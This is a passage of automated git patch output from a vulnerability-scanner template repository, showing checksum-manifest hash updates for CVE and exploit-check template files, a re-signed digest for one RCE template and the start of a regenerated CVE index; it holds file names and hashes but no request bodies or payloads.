-http/cves/2023/CVE-2023-4634.yaml:9911ff9ad5e096083e2f8082a22b868aa7f261a3 -http/cves/2023/CVE-2023-46347.yaml:bb0f1e67bb28da1b426e41802d4bb0d6f61035ec -http/cves/2023/CVE-2023-46359.yaml:e099ca11dccb079f80b7a6a2f428506692b5bc83 -http/cves/2023/CVE-2023-46574.yaml:d047c8594bd07e24c92dce889e0c211c73b7dd22 -http/cves/2023/CVE-2023-46747.yaml:70d00d50e355533780d4855cf0360b20144f8afc -http/cves/2023/CVE-2023-46805.yaml:49bde9b8955972ec5ac1dd765914358605c31f92 +http/cves/2023/CVE-2023-42442.yaml:d758c6128139420e4eac53717980f5e310e7a0cb +http/cves/2023/CVE-2023-42793.yaml:b72d97514990752b6ccc63f48b6782d6467ac42b +http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a +http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 +http/cves/2023/CVE-2023-43208.yaml:f1ece752ca9942c76379ef47d20c1dc6f6814173 +http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 +http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f +http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d +http/cves/2023/CVE-2023-43374.yaml:d3716d82a599eec38d7248bceb7a95b73dd5812f +http/cves/2023/CVE-2023-43795.yaml:ac764a43ee503fd6799b47c652c8b23fa413e1ac +http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a +http/cves/2023/CVE-2023-44352.yaml:f48ccac60a8d013601f2e1706e8326e3243cc2c6 +http/cves/2023/CVE-2023-44353.yaml:82991b999365d1cac94d95fd52aff5f8ea89506b +http/cves/2023/CVE-2023-4451.yaml:d912d3e1ed3cc84ee7b6416839b28a16e5566955 +http/cves/2023/CVE-2023-44812.yaml:f2aaf62c29bd8b70f20804e1b56537d9f5ec3712 +http/cves/2023/CVE-2023-44813.yaml:350f2faeb325dd8eb6e0c73262240ef5a2eeccbd +http/cves/2023/CVE-2023-4521.yaml:4e3f3a6520dae179752fb5bf24b967b99d65f4a1 +http/cves/2023/CVE-2023-45375.yaml:a49c50475479435dd05b4a3f6ff7549e2e4de081 +http/cves/2023/CVE-2023-4542.yaml:94982eb03aa4a5a1d8d17e37d9a3e7110da81d64 +http/cves/2023/CVE-2023-4547.yaml:f35005a0035fb0980139129649d73a6f577bbd66 +http/cves/2023/CVE-2023-45542.yaml:137cadf0894adf5a9bbb7e447a9b7d4d2ca849e6 +http/cves/2023/CVE-2023-45671.yaml:f573f401497165968fc2e77f7c722accd3052148 +http/cves/2023/CVE-2023-4568.yaml:b3519b98d445f49c15ec25def5abf6f71f7502a1 +http/cves/2023/CVE-2023-45852.yaml:d333744fa6118d998f0dc5f601625859966c461d +http/cves/2023/CVE-2023-45855.yaml:467a093aca097d3c97d6fce9fa38725202433759 +http/cves/2023/CVE-2023-4596.yaml:6e50ca87bfa5d77ea31f04d6bb5022c236ac9340 +http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc +http/cves/2023/CVE-2023-46347.yaml:b34a7dc91ea30e9c2109c7b75f3672336a67738c +http/cves/2023/CVE-2023-46359.yaml:9c1bcb93e8ca6c307f8ac5012de374ed21837245 +http/cves/2023/CVE-2023-46574.yaml:ad5fe1bb6f5e09d7a12160ada18cf418316d3182 +http/cves/2023/CVE-2023-46747.yaml:b27d327fbc25444c121c20945c0e2fad4a913f53 +http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 -http/cves/2023/CVE-2023-4714.yaml:9e54ad7ef07ff844f390a7b8b884063dd3491f74 -http/cves/2023/CVE-2023-47211.yaml:e1381355d1efad0bda01b17816a75d6df2972bb3 -http/cves/2023/CVE-2023-47218.yaml:b0c24c4a4961ef70ed0cd35250c8c70f00cde6fd -http/cves/2023/CVE-2023-47246.yaml:04af302e2804cdab8c72c3a73c19b91db29a646c -http/cves/2023/CVE-2023-47643.yaml:0eea9fe823d7a83cb7b1399798a95d421841fa63 +http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 +http/cves/2023/CVE-2023-47211.yaml:aba86670623dcf39feb32dd7042ab9a29ed72a45 +http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa +http/cves/2023/CVE-2023-47246.yaml:7f0547a2b48fb64eef94636f8033c984eda1840c +http/cves/2023/CVE-2023-47643.yaml:9a9f282f0113bc4a94d4cd55d184bd13e6488e76 http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:b5181539e5c575cfeac27ad62e94f9e2459b7ced +http/cves/2023/CVE-2023-48084.yaml:eff7decc7c45e122e653f200399885bb44ff01f6 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 -http/cves/2023/CVE-2023-49070.yaml:65e0930328b458ab7e4213c9782efa52b73fb507 -http/cves/2023/CVE-2023-49103.yaml:f5757f90f945c79084ee7a8e4431ccf8bdecc58c -http/cves/2023/CVE-2023-4966.yaml:1a39adf34b4332b05432f084bdda7d88bfb899c4 -http/cves/2023/CVE-2023-4973.yaml:9d8c23669f0b1fb8ef2f819f6ff0df9e838816d6 -http/cves/2023/CVE-2023-4974.yaml:95265a132c2a648c8f300f6b598af0090ed6b7a8 -http/cves/2023/CVE-2023-49785.yaml:3c952b09c12553c59b87955301943b4a7571bc8f -http/cves/2023/CVE-2023-5003.yaml:44df345838430a46851567849110fb4ec89e1e2f -http/cves/2023/CVE-2023-50290.yaml:0da1226999b17e405296b4e45193b418fda58f26 -http/cves/2023/CVE-2023-5074.yaml:e03366c2de9746143fb284e90422d9cf4b2c684a -http/cves/2023/CVE-2023-5089.yaml:ab5fdcebc0ea3196856dc0b6bfe7b95c5e27a366 -http/cves/2023/CVE-2023-50917.yaml:183f41d5151e36eaadb744564a2f3e9dd830b72e -http/cves/2023/CVE-2023-50968.yaml:b1faf39acf862d06ffda53e8710e8cf1afae17e8 -http/cves/2023/CVE-2023-51467.yaml:c0eb1dcb70d547279a1e26e464acea6f9332ae0a -http/cves/2023/CVE-2023-52085.yaml:f1a43c0e82be4e6ae94f5403b92df1173f1a7786 -http/cves/2023/CVE-2023-5244.yaml:7c81d0654ee6997857ff2bc8db90c9ed2ce2b2f5 -http/cves/2023/CVE-2023-5360.yaml:5a0953946a042f7a8fd406380fa54b3088f7f643 -http/cves/2023/CVE-2023-5375.yaml:0ec7f1a46cd93b5d2d78086baccb701fa2af2207 -http/cves/2023/CVE-2023-5556.yaml:b6c708adff651f31ba82db7bc458982513ebe287 -http/cves/2023/CVE-2023-5830.yaml:58fcd24876880ad298f4b9827096c3f95d443577 -http/cves/2023/CVE-2023-5914.yaml:a7a4abc8e632a96c541984a6e47b834f1a931037 -http/cves/2023/CVE-2023-5991.yaml:71a29af2239b64d52ad3aa7bb799c284d74ac2f1 -http/cves/2023/CVE-2023-6018.yaml:0cf547ac6737dc4aec9443e34e331cd477e63f34 -http/cves/2023/CVE-2023-6020.yaml:12c27a4b3c8ba5a23f1deaa5a751adbdde5aca0e -http/cves/2023/CVE-2023-6021.yaml:78b6bcae9d5a27f05380dccf231430030f86b377 -http/cves/2023/CVE-2023-6023.yaml:647fa12f828736a1e60899d855c2ee3413776f04 -http/cves/2023/CVE-2023-6038.yaml:edbf511e8df255d81032508ae0db5da0878e9306 -http/cves/2023/CVE-2023-6063.yaml:3aff55fe4445b86e5ef515902a0460a5a683440a -http/cves/2023/CVE-2023-6065.yaml:43d54ded80789f0d3854c9f6a8af5f2a4d745be1 -http/cves/2023/CVE-2023-6114.yaml:f90be5554fc97d768bfb627c3a898da9663f8db4 -http/cves/2023/CVE-2023-6360.yaml:6e0753aac7b53d1c7bc9ae41a078eb0582912162 -http/cves/2023/CVE-2023-6379.yaml:613d522af5db85c143fdcc2b38dfaa26ca136ef0 -http/cves/2023/CVE-2023-6380.yaml:859a707d6c9c81e4c3e8781a3beff189b51c8f49 -http/cves/2023/CVE-2023-6389.yaml:d0ed9d0fd87114fa3f29d8a4165d42fe6c79f343 -http/cves/2023/CVE-2023-6553.yaml:b2e33e3f496ce2052a849e370f8a9f4f52e619f2 -http/cves/2023/CVE-2023-6567.yaml:1d4f79dc0de243eab84fc5ac41220aac35476c2e -http/cves/2023/CVE-2023-6623.yaml:95a28cb42b74962a876414ea6387f16836f5ba48 -http/cves/2023/CVE-2023-6634.yaml:58d0acfc67990c665c1a4dd288d7735aab2a1999 -http/cves/2023/CVE-2023-6831.yaml:6660cec376c2fd84924762f057aaf7739a8e7afc -http/cves/2023/CVE-2023-6875.yaml:3b87c1cc3387c7eefb5a420057312c9416d4e191 -http/cves/2023/CVE-2023-6895.yaml:7ff1cccef6008880bb745da89ab0776719f590c9 -http/cves/2023/CVE-2023-6909.yaml:7f1c1674a74c530291653e3e4af3a8a7064b8176 -http/cves/2023/CVE-2023-6977.yaml:62a94baffe86139a9983e2b81d2b6bb522ab72d1 -http/cves/2023/CVE-2023-6989.yaml:fb7348efce4dfc99db7b9a2d0216d4c6cba74f6e -http/cves/2023/CVE-2023-7028.yaml:5e8b05b284c13ecabce6ee3c42d1804054abdb56 -http/cves/2024/CVE-2024-0195.yaml:9a92a4d8719e68413de8d1fade2119e0a623f21d -http/cves/2024/CVE-2024-0200.yaml:62d03d5fdc128f489257fefda03aa4ac148b510a -http/cves/2024/CVE-2024-0204.yaml:c94c5ccdd259b91be5958278994a3f6e228c0eef -http/cves/2024/CVE-2024-0235.yaml:a22bdc7ca804a6d0311f17c87cce6d5cf903825f -http/cves/2024/CVE-2024-0305.yaml:6bf530b827ae9684e18b3fbf2ae8210d0f724155 -http/cves/2024/CVE-2024-0337.yaml:f77b7bd1d93eda04a6aaf94f99ac1766cceda25c -http/cves/2024/CVE-2024-0352.yaml:c262817270ffae9efcec3d8996ea81f3f7b8b3fe -http/cves/2024/CVE-2024-0713.yaml:68de9c6afca59de5238a26024c82547a6ba57cea +http/cves/2023/CVE-2023-49070.yaml:6c28abe1b512113e46615f78c895b0f8b7d88a53 +http/cves/2023/CVE-2023-49103.yaml:df7f916859a7176f5867dd438b7b25c4598e8194 +http/cves/2023/CVE-2023-4966.yaml:afd8e0c40d087f04b630fbe118e1eaa3cab06596 +http/cves/2023/CVE-2023-4973.yaml:abedefada4ac0c871cf7f7d70b2a34ad065b7ba7 +http/cves/2023/CVE-2023-4974.yaml:17ee929a70a9d371a6eb202b2d989b57e6fc371f +http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 +http/cves/2023/CVE-2023-5003.yaml:a391fe60d1332779d04102762bfaac503c01b99f +http/cves/2023/CVE-2023-50290.yaml:a89cabb1f8777c2fa48dc314c6a8bb482d2a3806 +http/cves/2023/CVE-2023-5074.yaml:2f91841fa7a9ca7839288a0c2539941f0e9f815b +http/cves/2023/CVE-2023-5089.yaml:b49f08cd62fce95d77dfdd2c17355553b5b78c24 +http/cves/2023/CVE-2023-50917.yaml:24ba1b92719da10e25c7faa5a21b8e1793efc1e6 +http/cves/2023/CVE-2023-50968.yaml:1c7231aa1afc9b9f470216bd2f64d2e084e0c564 +http/cves/2023/CVE-2023-51467.yaml:ea8aacef3fc466e4a13378dffd2b8bb52defa1fa +http/cves/2023/CVE-2023-52085.yaml:cc65c397628889cec7f61857da0b323c8b0e7f4e +http/cves/2023/CVE-2023-5244.yaml:03d55a9e17a9b51e7a9aa871411021c9a98da704 +http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 +http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc +http/cves/2023/CVE-2023-5556.yaml:d4312b384f0e855174b1ac442795700fc93c8bbf +http/cves/2023/CVE-2023-5830.yaml:1aa70a4ec2154915982b9abe3a74c505dfb4d780 +http/cves/2023/CVE-2023-5914.yaml:475f2bb7c026929585409314f7c8fd6f35cce886 +http/cves/2023/CVE-2023-5991.yaml:9873fa30a831b40e777a00fc4ac02f243ac75b69 +http/cves/2023/CVE-2023-6018.yaml:0ebc4933948b094af932753294baf1f5f43be5ad +http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 +http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 +http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 +http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 +http/cves/2023/CVE-2023-6063.yaml:32096f6833a737d95a0ecdc8efd59c606fddd027 +http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 +http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe +http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 +http/cves/2023/CVE-2023-6379.yaml:344ac33322c6ae6e332b9223d49a9a728489231b +http/cves/2023/CVE-2023-6380.yaml:b8c966913d7f35aa184b05f6c05c139d619191b0 +http/cves/2023/CVE-2023-6389.yaml:80902b5a71d8f7f58b612c269eac562c10153ff1 +http/cves/2023/CVE-2023-6553.yaml:c572f40098138cb52f89c91950c68594cce89adf +http/cves/2023/CVE-2023-6567.yaml:1bd331b977c1566ead0ba2214ef5e0c1e41970cf +http/cves/2023/CVE-2023-6623.yaml:e781090c3c7e05d6ac52f9ed663eb47bc99f9e72 +http/cves/2023/CVE-2023-6634.yaml:271edc659ab6198e503f6b2f853dd7b638123507 +http/cves/2023/CVE-2023-6831.yaml:61fad718001632269bbc179436be24568b060fd4 +http/cves/2023/CVE-2023-6875.yaml:49ae1c1fe43946afb693947ae99199caa87c21b6 +http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c +http/cves/2023/CVE-2023-6909.yaml:3a1c12f4b5868f39c614d7b619700d37dedd588b +http/cves/2023/CVE-2023-6977.yaml:57fe00b51cc1fda9f7e1850ccd265acc0f52ef69 +http/cves/2023/CVE-2023-6989.yaml:8510679254d0c54f4292b95a24fc1344d768c3b2 +http/cves/2023/CVE-2023-7028.yaml:56b5cd908db926c6a908a68d79b3304f6f327a5e +http/cves/2024/CVE-2024-0195.yaml:1029799f6633077e409b399fb30e7e44cdb20487 +http/cves/2024/CVE-2024-0200.yaml:8def6d854c9af306acaea3df5ce36cf2067e255a +http/cves/2024/CVE-2024-0204.yaml:e9fa443bf70ed09783f89718081890844601391f +http/cves/2024/CVE-2024-0235.yaml:a7f3ae0fbae1d5e167c40c248558a60e210ee480 +http/cves/2024/CVE-2024-0305.yaml:4c322a618eab85bc9f4809462de046feaaeb0701 +http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 +http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 +http/cves/2024/CVE-2024-0713.yaml:4233f7803e3cb90da0851977a4c6de497a18d61b http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:81d7ffc9d132b673f7757d6b08c2dbd2847a0f9b +http/cves/2024/CVE-2024-1021.yaml:99e0b72a97304c3bf86a4a78e5f6b721221683fb http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d -http/cves/2024/CVE-2024-1071.yaml:3af798153fa941a00376b2dc03502960fbc1f36d +http/cves/2024/CVE-2024-1071.yaml:4db8738e930dacc926156a093eed6602d60a583a http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 -http/cves/2024/CVE-2024-1208.yaml:287c09eb17c7864442f835df934c7f4dfa4d520a -http/cves/2024/CVE-2024-1209.yaml:aed0338ee5cf0a1a0ba5e259d5afa5fd9b088df4 -http/cves/2024/CVE-2024-1210.yaml:7eb962fcb42e13310c5eed2005e9d72ba1acacdc +http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e +http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c +http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:1d7ea0ff7ffee2714ab6c591394b11cd5151eab6 +http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:af397b8d43398034dfb882a890a13219e972ffdb -http/cves/2024/CVE-2024-20767.yaml:624154e090933ad51bbcb882a5bd52fbf70928cd -http/cves/2024/CVE-2024-21644.yaml:1f73c9ae6bf21e7ca3d0cfabb439ef772287aa7b -http/cves/2024/CVE-2024-21645.yaml:d371558dd931ed3b6eec1e8e7401ca4a0f8b6319 -http/cves/2024/CVE-2024-21683.yaml:4d37563c0e58c53b849999c96fafb1fe173b4ede -http/cves/2024/CVE-2024-21887.yaml:7ded7fecbf1bdede573928e97c3d48f1b6db2a17 -http/cves/2024/CVE-2024-21893.yaml:403d9491255a70d1fd5ae5b41ef554adf01888eb -http/cves/2024/CVE-2024-22024.yaml:d53fc0281004592753093a77fedd54322bc7526d -http/cves/2024/CVE-2024-22319.yaml:727a1cab59ca03b93d1e120f1768ccefd5bbeed4 +http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 +http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 +http/cves/2024/CVE-2024-21644.yaml:77f0255102382e9e404d4054408803175ca19cf5 +http/cves/2024/CVE-2024-21645.yaml:767ebb9ae34a75ef4ea555762287fa63997897d1 +http/cves/2024/CVE-2024-21683.yaml:657419eac116dffe80bc62d4e4588a2168564b67 +http/cves/2024/CVE-2024-21887.yaml:4b36342fe050f53bc2ff1ac11ca13e95b404bad7 +http/cves/2024/CVE-2024-21893.yaml:599b798ebf591a068799a211d4764cacf0e7508f +http/cves/2024/CVE-2024-22024.yaml:9af28e0670ae9c74797592276bfaa6417776c078 +http/cves/2024/CVE-2024-22319.yaml:82399268f85f4057eb6c759cd2699c9005f15a3b http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:7f2ddc59d05ee8143e928a3a0fdebe32fa8376a1 +http/cves/2024/CVE-2024-22927.yaml:9c87536b6f8b4467aac60188d0b0f3ceee471bc9 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2340.yaml:8b4e6176085fd2e23294d24fe4ad16623e6c04d2 +http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:30e3c4167ab654c921a0099ca71173f3aaa4efb6 -http/cves/2024/CVE-2024-24131.yaml:92521d7f06cc522caf757cf4955580a6ce81f11c -http/cves/2024/CVE-2024-24919.yaml:dc70da2422a62df9120e90019f4b177f82b9637a +http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef +http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff +http/cves/2024/CVE-2024-24919.yaml:59be299acfb1747ce7401170404292e788d0a822 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 -http/cves/2024/CVE-2024-25735.yaml:6cb37a640b41863066cfcc9d917f6da3bca178ef -http/cves/2024/CVE-2024-26331.yaml:09399db8fb7ac4ae716c9b1d7a25a73727288132 -http/cves/2024/CVE-2024-27198.yaml:ef5197d6f52235dfa22a237ec3ba7b1dfdaf5492 +http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 +http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 +http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:183826f7991890e37661f393a43e76714418b327 -http/cves/2024/CVE-2024-28255.yaml:4e37fca1899d0664c6cc28b4d4ce66301db56ab2 -http/cves/2024/CVE-2024-28734.yaml:c947ad89f7a1c41c08be582fe05bfaf52e52784b +http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c +http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 +http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:1682b1027f2599bfed61d6922b4ad1e7af2963e7 -http/cves/2024/CVE-2024-29059.yaml:f36dad1af1afa0f510ee81e4cd653d23223988e8 -http/cves/2024/CVE-2024-29269.yaml:5a971a5e38e628cd7af595e83ff531ad9b912694 -http/cves/2024/CVE-2024-3097.yaml:061fb056a1993b992d863ec26cd78d368fe58473 -http/cves/2024/CVE-2024-3136.yaml:f41042c96e9dbb187c897bfb9b4fd4b0a82ca732 +http/cves/2024/CVE-2024-2879.yaml:8f4368955da161211eeaa0efc6bc9074fc1aeabb +http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 +http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 +http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 +http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc -http/cves/2024/CVE-2024-31848.yaml:784556c618c53d8d471b21fc04f3a040cc96f492 -http/cves/2024/CVE-2024-31849.yaml:d34bdd05da8c050a14fe72bb8dc7f54e45242250 -http/cves/2024/CVE-2024-31850.yaml:9ad703db727ec444a5579104f225275e1e626ddf +http/cves/2024/CVE-2024-31848.yaml:964b3ea6c30926284050eaca30c9aea8021784fc +http/cves/2024/CVE-2024-31849.yaml:0af61ea378a0dfbf2d49cdb29315b87731f95662 +http/cves/2024/CVE-2024-31850.yaml:7855c674a896328dd31f2980fa7e758cfca95847 http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:e7baf7a6e22f175cc2f3b236ef68853cdf814506 +http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 -http/cves/2024/CVE-2024-3273.yaml:14cd3a5d8b64e3e05dccebedbebc95045bcfdc2d +http/cves/2024/CVE-2024-3273.yaml:90b3bda22f55a43e5a3a59e482161317d6f26f36 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:cffffecf77c06ef57f987b130b2e8f28dd272b19 -http/cves/2024/CVE-2024-33724.yaml:620bb7553b4cef24c012f5a3a3655c0ee8146c78 -http/cves/2024/CVE-2024-3400.yaml:2bd600db500bb43b0afc7d7e694df41eeceb143f +http/cves/2024/CVE-2024-33575.yaml:3ab58da58f0076d6b593ca0ac312d8fc53a10f03 +http/cves/2024/CVE-2024-33724.yaml:54d8f232b79b426f6e06e8300b3fb141224f7ed2 +http/cves/2024/CVE-2024-3400.yaml:0d91cd0f3d285a63864754f7d2a0fcab4e54b7af http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 -http/cves/2024/CVE-2024-4040.yaml:0ec0a0dcbc9149db436ec147018574d574f45b25 -http/cves/2024/CVE-2024-4348.yaml:bbab477b0fd48166cf20c7a11b381830042bc34d +http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad +http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7899,7 +7899,7 @@ http/vulnerabilities/other/opencti-lfi.yaml:4436182554e2970f2129db430e2fede74a1a http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:4fb8f1900823a5ac074fca0719184c2727b46c37 http/vulnerabilities/other/openshift-log4j-rce.yaml:9981be094dfeb786c2526d931ebee412690d2b6b http/vulnerabilities/other/opensis-lfi.yaml:c1f5b90b135d401109243e355fc7a2eb6597a0a7 -http/vulnerabilities/other/opensns-rce.yaml:a3f0aee977fa0e7272db4920a6fee104c3dd46ec +http/vulnerabilities/other/opensns-rce.yaml:bb8e06d5e9d8cdd153b473fd8c28aeca186958b2 http/vulnerabilities/other/openvpn-hhi.yaml:3fcb3e167c4c7671807948d7d5268e6dd821f93c http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:58f9b71232e69f91b9ea83abdcb79394c40ae2f6 http/vulnerabilities/other/oracle-fatwire-lfi.yaml:ddecec2e84838ce0db6d8038c370dc2559c0eb62 @@ -8614,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6eb1cefac9f148d20991468437446ac844aca82d +templates-checksum.txt:40337c1eafe1c0e548003abfa4adba4c37c3ea8a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 281cd621616e5633dce085856b11a98f552f8260 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:07:19 +0000 Subject: [PATCH 568/847] Auto Template Signing [Sat Jun 1 09:07:19 UTC 2024] :robot: --- http/vulnerabilities/other/opensns-rce.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index 24fa77d4b2..bdf0585c95 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -36,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081f7cd7d5435b07de487b7d57d012fc8118f4adbee9062c7d803c6af555cb0e3022055309d98a0bbb07ed3c399389c8cac30c274abe8e95b58622aa913c9750d589c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008ed7eddc3dd192dd32c667a6630dcada4e3c410567407417370663b3a74f22b102206b0bcd9cbbb316ecf7faeed8237e696c985e465f3ab03796887fa815b182b308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b4fb3f63997fed2f1fe001ccc63afdc208136315 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:32:18 +0000 Subject: [PATCH 569/847] Auto Generated cves.json [Sat Jun 1 09:32:18 UTC 2024] :robot: --- cves.json | 19 ++++++++++--------- cves.json-checksum.txt | 2 +- 2 files changed, 11 insertions(+), 10 deletions(-) diff --git a/cves.json b/cves.json index efb544a3c7..c65ce3d4eb 100644 --- a/cves.json +++ b/cves.json @@ -500,7 +500,7 @@ {"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" 